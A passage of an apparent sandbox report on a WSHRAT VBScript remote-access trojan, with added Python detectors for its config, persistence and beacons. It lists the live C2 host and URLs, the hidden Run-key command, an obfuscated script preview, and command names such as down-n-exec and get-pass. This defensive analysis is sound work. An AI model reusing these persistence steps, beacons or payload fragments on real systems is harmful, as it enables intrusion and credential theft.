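    r'\b(?P<key>host|port|installdir|lnkfile|lnkfolder|spliter|sleep)\s*=\s*'
    r'(?:"(?P<str>[^"]*)"|(?P<num>\d+)\b|(?P<bool>true|false)\b)',
    re.IGNORECASE,
)
# `select case cmd (0)` has no quoted literal, so only the verb labels match.
_CASE_RE = re.compile(r'\bcase\s+"(?P<name>[^"]+)"', re.IGNORECASE)
# Covers both call styles in the capture: post ("is-ready","") and post "is-logs", ...
_POST_RE = re.compile(r'\bpost\s*\(?\s*"(?P<path>[^"]+)"', re.IGNORECASE)


def extract_config(script):
    """First assignment per key, typed: str for quoted, int for digits, bool for true/false."""
    config = {}
    for m in _ASSIGN_RE.finditer(script):
        key = m.group("key").lower()
        if key in config:          # keep the config-block value, not later reassignments
            continue
        if m.group("str") is not None:
            config[key] = m.group("str")
        elif m.group("num") is not None:
            config[key] = int(m.group("num"))
        else:
            config[key] = m.group("bool").lower() == "true"
    return config


def extract_commands(script):
    """Dispatcher verbs in source order, deduplicated."""
    names = []
    for m in _CASE_RE.finditer(script):
        if m.group("name") not in names:
            names.append(m.group("name"))
    return names


def extract_endpoints(script):
    """Endpoint names passed to post(), in source order, deduplicated."""
    paths = []
    for m in _POST_RE.finditer(script):
        if m.group("path") not in paths:
            paths.append(m.group("path"))
    return paths


def c2_urls(script):
    """Beacon URLs the bot will request: http://host:port/<endpoint>."""
    cfg = extract_config(script)
    return ["http://%s:%d/%s" % (cfg["host"], cfg["port"], p) for p in extract_endpoints(script)]


def summarize(script):
    return {"config": extract_config(script),
            "commands": extract_commands(script),
            "c2_urls": c2_urls(script)}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_SCRIPT), indent=2))
```

Running it on the sample yields the host and port that the report's network section confirms (chongmei33.publicvm.com:7045), the `/is-ready` and `/is-processes` URLs that appear in the URL table, and the command list that the AMSI "suspicious string" hits are drawn from. The regexes do not depend on line structure, so they can be pointed at a capture whose line breaks were lost, as long as the tokens themselves are still separated.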

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe  File created: C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs

Boot Survival

Source: C:\Windows\System32\wscript.exe  File created (dropped file): C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs (3 occurrences)
Source: C:\Windows\System32\wscript.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs\:Zone.Identifier:$DATA (3 occurrences)
Source: C:\Windows\System32\wscript.exe  Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run  ORDER230322 (2 occurrences)
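The two artefacts above, a .vbs copy in the per-user Startup folder and an HKCU Run value that launches wscript.exe in batch mode (//B) on a script in %TEMP%, are exactly the footprint the Sigma rules named in the overview ("Register Wscript In Run Key", "Drops script at startup location") look for. The Python below is an added example and is not part of the Joe Sandbox report: it applies those two checks to constructed Sysmon-style records (Event ID 11 FileCreate, Event ID 13 RegistryEvent value set). The records are modelled on the Boot Survival evidence, including an alternate-data-stream write like the Zone.Identifier entry listed above; the SID and the two benign records (a vendor updater under Run, a .lnk in Startup) are made up and must not fire.

```python
"""Flag WSH-script persistence: a script dropped to a Startup folder, or a Run /
RunOnce value that launches wscript.exe or cscript.exe on a script file.

Added example, not part of the Joe Sandbox report. Input records are
constructed Sysmon-style events; a real feed carries the same fields.
"""
import re

SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
WSH_HOST_RE = re.compile(r"\b[cw]script(\.exe)?\b", re.I)
BATCH_FLAG_RE = re.compile(r"(?:^|\s)//B(?:\s|$)", re.I)          # //B suppresses script errors
TRUSTED_DIR_RE = re.compile(r"^[a-z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)

# Constructed events modelled on the report's Boot Survival evidence. The SID
# and the last two (benign) records are made up.
SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
EVENTS = [
    {"id": 11, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs"},
    {"id": 11, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs:Zone.Identifier"},
    {"id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "target": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\ORDER230322",
     "details": r'wscript.exe //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs"'},
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe",
     "target": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdate",
     "details": r'"C:\Program Files\Vendor\update.exe" /quiet'},
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notes.lnk"},
]


def strip_ads(path):
    """Drop an alternate-data-stream suffix: file.vbs:Zone.Identifier -> file.vbs."""
    drive, sep, rest = path.partition(":\\")
    return drive + sep + rest.split(":", 1)[0] if sep else path


def startup_script_drop(ev):
    """Event ID 11: a WSH script (or a stream of one) created in a Startup folder."""
    if ev["id"] != 11:
        return None
    path = strip_ads(ev["target"])
    if STARTUP_RE.search(path) and path.lower().endswith(SCRIPT_EXT):
        return {"rule": "startup_script_drop", "path": path, "image": ev["image"]}
    return None


def wscript_run_key(ev):
    """Event ID 13: a Run/RunOnce value whose command runs wscript/cscript on a script."""
    if ev["id"] != 13 or not RUN_KEY_RE.search(ev["target"]):
        return None
    cmd = ev.get("details", "")
    if not WSH_HOST_RE.search(cmd):
        return None
    # Script path: the first quoted argument, otherwise the last token.
    m = re.search(r'"([^"]+)"', cmd)
    script = m.group(1) if m else cmd.split()[-1]
    if not script.lower().endswith(SCRIPT_EXT):
        return None
    return {"rule": "wscript_run_key",
            "value": ev["target"].rsplit("\\", 1)[-1],
            "script": script,
            "batch_mode": bool(BATCH_FLAG_RE.search(cmd)),
            "untrusted_dir": not TRUSTED_DIR_RE.match(script)}


def scan(events):
    """One hit per matching event, in input order."""
    hits = []
    for ev in events:
        for rule in (startup_script_drop, wscript_run_key):
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The Zone.Identifier event is deliberately kept: stripping the stream suffix before matching means a detector does not miss the drop when only the ADS write is logged, and the stream itself tells you the copy carries a mark-of-the-web. The Run-key rule records batch mode and an untrusted script location as separate fields so a SIEM can score them rather than hard-code one verdict.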

Hooking and other Techniques for Hiding and Protection

Source: unknown  Network traffic detected: HTTP traffic on ports 49698 through 49732 -> 7045 (38 flows listed, one per consecutive ephemeral source port; 49715 and 49732 each appear twice, and one entry is in the reverse direction, 7045 -> 49703)
Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX (16 occurrences)
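The flows listed above are plain HTTP to TCP 7045 on the C2 host, each request on a fresh ephemeral source port, at a rate consistent with the script's sleep = 5000; the URL table later in the report shows the /is-ready and /is-processes endpoints. The Python below is an added example and is not part of the Joe Sandbox report: it groups requests to the dispatcher's reply endpoints (is-ready, is-logs, is-cmd-shell, is-processes, taken from the captured script) per source, destination and port, measures their cadence and counts distinct source ports, and rates a steady beacon or HTTP on a non-standard port as high. The log is a constructed, Zeek-http.log-like tab-separated layout, not a capture from this analysis; the client 10.0.0.5, the benign rows and their addresses are made up. A small helper also splits a C2 reply the way the bot does, on the "|" spliter.

```python
"""Hunt for WSHRAT beacons in HTTP logs.

Added example, not part of the Joe Sandbox report. Endpoint names come from
the captured dispatcher; the log rows are constructed.
"""
import statistics

WSHRAT_PATHS = {"/is-ready", "/is-logs", "/is-cmd-shell", "/is-processes"}
STANDARD_HTTP_PORTS = {80, 8080, 8000, 8008, 8888}

# Constructed rows: ts  src  sport  dst  dport  method  host  uri
# Five beacons to 103.47.144.22:7045 on consecutive source ports every 5 s,
# then two unrelated requests (a standard-port GET and a look-alike path on 8080).
HTTP_LOG = """\
1679481453.0\t10.0.0.5\t49698\t103.47.144.22\t7045\tPOST\tchongmei33.publicvm.com:7045\t/is-ready
1679481458.0\t10.0.0.5\t49699\t103.47.144.22\t7045\tPOST\tchongmei33.publicvm.com:7045\t/is-ready
1679481463.0\t10.0.0.5\t49700\t103.47.144.22\t7045\tPOST\tchongmei33.publicvm.com:7045\t/is-ready
1679481468.0\t10.0.0.5\t49701\t103.47.144.22\t7045\tPOST\tchongmei33.publicvm.com:7045\t/is-processes
1679481473.0\t10.0.0.5\t49702\t103.47.144.22\t7045\tPOST\tchongmei33.publicvm.com:7045\t/is-ready
1679481460.0\t10.0.0.5\t49750\t203.0.113.10\t80\tGET\tfs.microsoft.com\t/
1679481461.0\t10.0.0.7\t50111\t198.51.100.9\t8080\tPOST\tintranet.example\t/is-ready
"""


def parse_http_log(text):
    """Tab-separated rows into dicts; blank and comment lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, sport, dst, dport, method, host, uri = line.split("\t")
        rows.append({"ts": float(ts), "src": src, "sport": int(sport), "dst": dst,
                     "dport": int(dport), "method": method, "host": host, "uri": uri})
    return rows


def beacon_summary(rows):
    """Per (src, dst, dport): count, endpoints, median gap, distinct source ports, port class."""
    groups = {}
    for r in rows:
        if r["uri"] in WSHRAT_PATHS:
            groups.setdefault((r["src"], r["dst"], r["dport"]), []).append(r)
    summary = {}
    for key, flows in groups.items():
        ts = sorted(f["ts"] for f in flows)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        summary[key] = {
            "count": len(flows),
            "paths": sorted({f["uri"] for f in flows}),
            "median_interval": statistics.median(gaps) if gaps else None,
            "distinct_source_ports": len({f["sport"] for f in flows}),
            "nonstandard_port": key[2] not in STANDARD_HTTP_PORTS,
        }
    return summary


def alerts(rows, min_count=3, max_interval=60.0):
    """One alert per group. High when the cadence is steady or the HTTP port is
    non-standard; a lone request to a WSHRAT path on a normal port is low."""
    out = []
    for (src, dst, dport), s in beacon_summary(rows).items():
        periodic = (s["count"] >= min_count and s["median_interval"] is not None
                    and s["median_interval"] <= max_interval)
        reasons = []
        if periodic:
            reasons.append("steady cadence (~%.0fs)" % s["median_interval"])
        if s["nonstandard_port"]:
            reasons.append("HTTP on non-standard port %d" % dport)
        out.append({"severity": "high" if reasons else "low", "src": src, "dst": dst,
                    "dport": dport, "reasons": reasons, **s})
    return out


def parse_c2_command(response, spliter="|"):
    """Split a C2 reply as the bot does: cmd(0) is the verb, the rest are parameters."""
    parts = response.split(spliter)
    return parts[0], parts[1:]


if __name__ == "__main__":
    for a in alerts(parse_http_log(HTTP_LOG)):
        print(a["severity"], a["src"], "->", a["dst"], a["dport"], a["reasons"])
```

The path match alone is kept as a low-severity signal because the endpoint names are short and could collide with legitimate applications; the cadence and the port are what turn the report's evidence into a confident detection.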

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk (35 occurrences)
Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer (6 occurrences)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe  Domain query: chongmei33.publicvm.com
Source: C:\Windows\System32\wscript.exe  Network Connect: 103.47.144.22 7045
Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs (2 occurrences)
Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wscript.exe  WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct (35 occurrences)

Stealing of Sensitive Information

Source: Yara match  File source: amsi64_5492.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_2352.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_5448.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_4024.amsi.csv, type: OTHER
Source: Yara match  File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match  File source: amsi64_5492.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_2352.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_5448.amsi.csv, type: OTHER
Source: Yara match  File source: amsi64_4024.amsi.csv, type: OTHER
Source: Yara match  File source: dump.pcap, type: PCAP
Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: Suspicious string up-n-exec (4 occurrences)
Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: Suspicious string get-pass (4 occurrences)
Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: Suspicious string down-n-exec (4 occurrences)
Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: Suspicious string keylogger (4 occurrences)
Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: Suspicious string take-log (4 occurrences)
MITRE ATT&CK Matrix (transposed to one line per tactic; the numbers in brackets are the signature-count badges as displayed in the report, entries without a badge are the matrix's unmatched placeholders)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation [111]; Scripting [421]; PowerShell [1]; At (Windows)
Persistence: Registry Run Keys / Startup Folder [21]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection [111]; Registry Run Keys / Startup Folder [21]; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading [1]; Process Injection [111]; Scripting [421]; Obfuscated Files or Information [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery [11]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [3]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Standard Port [11]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data
Antivirus Detection

Initial sample:
Source           Detection  Scanner        Label
ORDER230322.vbs  27%        ReversingLabs  Script-WScript.Trojan.Valyria
ORDER230322.vbs  41%        Virustotal     (link only in the original report)
Dropped files, unpacked PE files, domains, URLs: no antivirus matches

Domains:
Name                     IP             Active  Malicious  Antivirus Detection  Reputation
chongmei33.publicvm.com  103.47.144.22  true    false      -                    high

Contacted Domains and URLs:
Name                                              Malicious  Antivirus Detection  Reputation
chongmei33.publicvm.com                           false      -                    high
http://chongmei33.publicvm.com:7045/is-processes  false      -                    high
http://chongmei33.publicvm.com:7045/is-ready      false      -                    high

Contacted IPs:
IP             Domain                   Country   ASN   ASN Name  Malicious
103.47.144.22  chongmei33.publicvm.com  Pakistan  9009  M247GB    false
                    Joe Sandbox Version:37.0.0 Beryl
                    Analysis ID:832141
                    Start date and time:2023-03-22 11:36:11 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: ORDER230322.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@8/4@1/1
EGA Information: Failed
HDC Information: Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Override analysis time to 240s for JS/VBS files not yet terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:37:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ORDER230322 wscript.exe //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs"
11:37:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ORDER230322 wscript.exe //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs"
11:37:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
chongmei33.publicvm.com | PO230317_COPY.vbs | malicious | WSHRat | 103.47.144.71
chongmei33.publicvm.com | cxI8z2rY3C.exe | malicious | AsyncRAT | 103.47.144.71
chongmei33.publicvm.com | P3ZmNVYoEJ.exe | malicious | AsyncRAT | 103.47.144.71
chongmei33.publicvm.com | ORDER-230316.xlsm | malicious | AsyncRAT | 103.47.144.71
chongmei33.publicvm.com | rIXVC7CIsu.exe | malicious | AsyncRAT | 103.47.144.126
chongmei33.publicvm.com | ORDER-230409.doc.exe | malicious | AsyncRAT | 103.47.144.100
chongmei33.publicvm.com | ORDER_2308044.pdf.vbs | malicious | WSHRat | 175.138.182.75
chongmei33.publicvm.com | ORDER-230770.pdf.vbs | malicious | WSHRat | 103.47.144.71
chongmei33.publicvm.com | MT103-CASH_TRANSFER.pdf.vbs | malicious | WSHRat | 103.47.144.122
chongmei33.publicvm.com | Payment Copy.vbs | malicious | WSHRat | 103.47.144.101
chongmei33.publicvm.com | Payment Details.pdf.js | malicious | WSHRat, VjW0rm | 103.47.144.105
chongmei33.publicvm.com | ORDER-17886.vbs | malicious | WSHRat | 103.47.144.60
chongmei33.publicvm.com | ORDER-2030213F.vbs | malicious | WSHRat | 103.47.144.60
chongmei33.publicvm.com | ORDER-230217A.vbs | malicious | WSHRat | 103.47.144.60
chongmei33.publicvm.com | a17hW45pFJ.vbs | malicious | WSHRat | 103.47.144.93
chongmei33.publicvm.com | ORDER_22727.jar | malicious | ADWIND | 172.111.233.12
chongmei33.publicvm.com | ORDER-220721.doc.js | malicious | VjW0rm | 45.74.6.13
chongmei33.publicvm.com | Scan_Quotation_22609.pdf.js | malicious | WSHRAT | 172.94.109.42
chongmei33.publicvm.com | ORDER-222505.doc.exe | malicious | Nanocore | 46.243.140.88
chongmei33.publicvm.com | Payment Advice.js | malicious | VjW0rm | 46.243.140.81
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | NyLTEgtzBe.elf | malicious | Unknown | 185.216.48.177
M247GB | Invoice INV-6830.htm | malicious | HTMLPhisher | 172.111.230.78
M247GB | https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsites.google.com%2fview%2fbeneficial-systems%2fhome&c=E,1,gvBiqP10BDqhuVGWmyqAN7XnzA4P48lLWTzHTY9Fo6vQc0J53KGQ14pUeVzJw2-4nu8zibFzCLsuRrPa2qqvmx1wJTJJmo8MYDSRO5BtEYMw&typo=1 | malicious | HTMLPhisher | 89.44.9.151
M247GB | Bank_Bri_Dokumen_Pembayaran_Pdf.exe | malicious | Remcos | 193.29.104.13
M247GB | informaci#U00f3n_de_reserva.vbs | malicious | Unknown | 194.187.251.91
M247GB | MOL.EXE.exe | malicious | LodaRat | 194.187.251.91
M247GB | FAKTURA_BG_01.exe | malicious | Remcos, DBatLoader | 172.111.253.15
M247GB | SqZa96pKGe.exe | malicious | Remcos | 185.9.19.107
M247GB | Debit_note23.exe | malicious | Remcos | 185.9.19.107
M247GB | Lainauspyynt#U00f6_Rakla_-lasku_2023_-_03_-_13.exe | malicious | Remcos | 185.156.175.35
M247GB | dr2yGJsoQi.elf | malicious | Mirai | 192.54.57.220
M247GB | x8UY0DD0zD.exe | malicious | Unknown | 89.238.170.250
M247GB | PO230317_COPY.vbs | malicious | WSHRat | 103.47.144.71
M247GB | sttyhMPl7t.elf | malicious | Unknown | 5.252.199.138
M247GB | W5NXDZqQd2.elf | malicious | Unknown | 5.252.199.138
M247GB | loligang.arm7.elf | malicious | Mirai | 93.120.57.198
M247GB | GZnibLfzbS.elf | malicious | Unknown | 5.252.199.138
M247GB | g01rDSzStu.elf | malicious | Unknown | 5.252.199.138
M247GB | aejztCaSRw.elf | malicious | Unknown | 5.252.199.138
M247GB | x3bM9QxzSO.elf | malicious | Unknown | 5.252.199.138
Process: C:\Windows\System32\wscript.exe
File Type: Non-ISO extended-ASCII text, with very long lines (2397), with CRLF line terminators
Category: dropped
Size (bytes): 256560
Entropy (8bit): 2.452409673778066
Encrypted: false
SSDEEP: 768:19C8cPTeUGV5V4ky1rHHPskYROOowLXMJuzHHMH+HCo/LiGi2tl33xRXC:yR
MD5: 2A76503660D140D0AA08BD758CB9C29C
SHA1: 55C1BA23321E11C0298450FB9DFA1CCEBDEA2D86
SHA-256: 5F0329E51F347CA573EA69CD865BB03D0526D9E9E91477A4502A9FE35C3FBDDF
SHA-512: F50DA5213BF53B02199A2D3C5C8D06643315BD939B5047BFE44A904B8CB45BE22793155F9055E9529C3EBD1861D14AE39528A9914E841AB3A91C6540C29B7390
Malicious: true
Reputation: low
Preview: 'Coded By Pjoao1578....Dim inmBsjrrYiGcfxeBXSCJ..inmBsjrrYiGcfxeBXSCJ = "" & _..vbCrLf & "On E!...........!r?????.??!...........!r?????.??!...........!o?????.??!...........!r?????.?? R!...........!e?????.??s!...........!u?????.??!...........!m?????.??!...........!e?????.?? N!...........!e?????.??x!...........!t?????.??" & _..vbCrLf & "" & _..vbCrLf & "WS!...........!c?????.??!...........!r?????.??!...........!i?????.??!...........!p?????.??!...........!t?????.??.S!...........!l?????.??!...........!e?????.??!...........!e?????.??!...........!p?????.?? 1!...........!0?????.??!...........!0?????.??!...........!9?????.??" & _..vbCrLf & "" & _..vbCrLf & "'<[ !...........!r?????.??!...........!e?????.??!...........!c?????.??!...........!o?????.??d!...........!e?????.??!...........!r?????.?? : k!...........!o?????.??!...........!g?????.??n!...........!i?????.??!...........!t?????.??!...........!o?????.?? (!...........!c?????.??) sky!...........!p?????.??!...........!e?????.?? : !...........!l
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Windows\System32\wscript.exe
File Type: Non-ISO extended-ASCII text, with very long lines (2397), with CRLF line terminators
Category: dropped
Size (bytes): 256560
Entropy (8bit): 2.452409673778066
Encrypted: false
SSDEEP: 768:19C8cPTeUGV5V4ky1rHHPskYROOowLXMJuzHHMH+HCo/LiGi2tl33xRXC:yR
MD5: 2A76503660D140D0AA08BD758CB9C29C
SHA1: 55C1BA23321E11C0298450FB9DFA1CCEBDEA2D86
SHA-256: 5F0329E51F347CA573EA69CD865BB03D0526D9E9E91477A4502A9FE35C3FBDDF
SHA-512: F50DA5213BF53B02199A2D3C5C8D06643315BD939B5047BFE44A904B8CB45BE22793155F9055E9529C3EBD1861D14AE39528A9914E841AB3A91C6540C29B7390
Malicious: true
Preview: 'Coded By Pjoao1578....Dim inmBsjrrYiGcfxeBXSCJ..inmBsjrrYiGcfxeBXSCJ = "" & _..vbCrLf & "On E!...........!r?????.??!...........!r?????.??!...........!o?????.??!...........!r?????.?? R!...........!e?????.??s!...........!u?????.??!...........!m?????.??!...........!e?????.?? N!...........!e?????.??x!...........!t?????.??" & _..vbCrLf & "" & _..vbCrLf & "WS!...........!c?????.??!...........!r?????.??!...........!i?????.??!...........!p?????.??!...........!t?????.??.S!...........!l?????.??!...........!e?????.??!...........!e?????.??!...........!p?????.?? 1!...........!0?????.??!...........!0?????.??!...........!9?????.??" & _..vbCrLf & "" & _..vbCrLf & "'<[ !...........!r?????.??!...........!e?????.??!...........!c?????.??!...........!o?????.??d!...........!e?????.??!...........!r?????.?? : k!...........!o?????.??!...........!g?????.??n!...........!i?????.??!...........!t?????.??!...........!o?????.?? (!...........!c?????.??) sky!...........!p?????.??!...........!e?????.?? : !...........!l
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
File type: Non-ISO extended-ASCII text, with very long lines (2397), with CRLF line terminators
Entropy (8bit): 2.452409673778066
TrID:
File name: ORDER230322.vbs
File size: 256560
MD5: 2a76503660d140d0aa08bd758cb9c29c
SHA1: 55c1ba23321e11c0298450fb9dfa1ccebdea2d86
SHA256: 5f0329e51f347ca573ea69cd865bb03d0526d9e9e91477a4502a9fe35c3fbddf
SHA512: f50da5213bf53b02199a2d3c5c8d06643315bd939b5047bfe44a904b8cb45be22793155f9055e9529c3ebd1861d14ae39528a9914e841ab3a91c6540c29b7390
SSDEEP: 768:19C8cPTeUGV5V4ky1rHHPskYROOowLXMJuzHHMH+HCo/LiGi2tl33xRXC:yR
TLSH: 66449A023E4BF93C165F2E0466380E370F8EFE62D619654A12095FBCA3A758C177F929
File Content Preview: 'Coded By Pjoao1578....Dim inmBsjrrYiGcfxeBXSCJ..inmBsjrrYiGcfxeBXSCJ = "" & _..vbCrLf & "On E!...........!r?????.??!...........!r?????.??!...........!o?????.??!...........!r?????.?? R!...........!e?????.??s!...........!u?????.??!...........!m?????.??!...
Icon Hash: e8d69ece869a9ec4
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/22/23-11:37:51.449935 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49698 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:37:58.976360 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49699 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:04.682959 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49700 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:10.473997 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49701 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:16.269118 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49702 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:21.870237 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49703 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:31.858320 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49705 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:37.956187 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49706 | 7045 | 192.168.2.3 | 103.47.144.22
03/22/23-11:38:44.353443 | TCP | 2017516 | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 | 49707 | 7045 | 192.168.2.3 | 103.47.144.22
